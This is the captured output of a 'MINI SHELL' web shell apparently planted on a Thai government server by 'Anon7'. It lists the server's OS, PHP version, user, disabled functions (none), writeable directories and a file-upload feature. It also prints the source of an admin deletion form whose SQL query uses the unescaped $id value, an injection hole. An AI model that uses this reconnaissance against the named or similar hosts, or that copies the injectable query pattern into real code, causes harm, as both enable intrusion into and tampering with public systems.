MINI SHELL

Server : Apache/2.2.2 (Fedora)
System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686
User : apache ( 48)
PHP Version : 5.2.9
Disable Function : NONE
Directory :  /var/www/html/pathumthani_vc/report/pdir/admin/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /var/www/html/pathumthani_vc/report/pdir/admin/officer_del_form.php
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html><head><title>ยืนยันการลบ</title>
<meta http-equiv="Content-Type" content="text/html; charset=windows-874">
<link href="../../../common/basiccss.css" rel="stylesheet" type="text/css">

<style type="text/css">
<!--
body {
	background-color: #EFEFEF;
}
-->
</style></head>

<body>
<?
 include ("../../../inc/conndb.inc.php");
 $sql = " SELECT officer.ID, officer.title, officer.th_name, officer.th_sname, officer.position, office_detail.office_id, office_detail.th_name,  ";
$sql = $sql ."  office_detail.tel1, office_detail.tel2, office_detail.tel3 FROM office_detail   ";
$sql = $sql ."  LEFT OUTER JOIN officer ON ( office_detail.office_id = officer.office_id ) WHERE office_id = '$id';  ";
$query_result = mysql_db_query($dbname,$sql);
//echo $sql;
?>
<form name="form1" method="post" action="officer_del.php">
<table width="204"  border="0" align="center" cellspacing="0">
  <tr>
    <td width="17%" align="center"><img src="../../../images_sys/alert.gif" width="31" height="32"></td>
    <td width="83%" align="center"><div align="left">คุณแน่ใจที่จะต้องการลบใช่หรือไม่ </div></td>
  </tr>
  <tr>
    <td>&nbsp;</td>    <td>&nbsp;</td>
  </tr>
  <tr>
    <td align="center">&nbsp;</td>
    <td>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<input type="submit" name="Reset2" value=" ตกลง ">&nbsp;
        <input name="Reset" type="reset" id="Reset3" value="ยกเลิก" onClick="window.close()";>
	    <input name="id" type="hidden" value="<?=$id?>">
    </td>
  </tr>
</table>  
</form>
</body>
</html>

Anon7 - 2021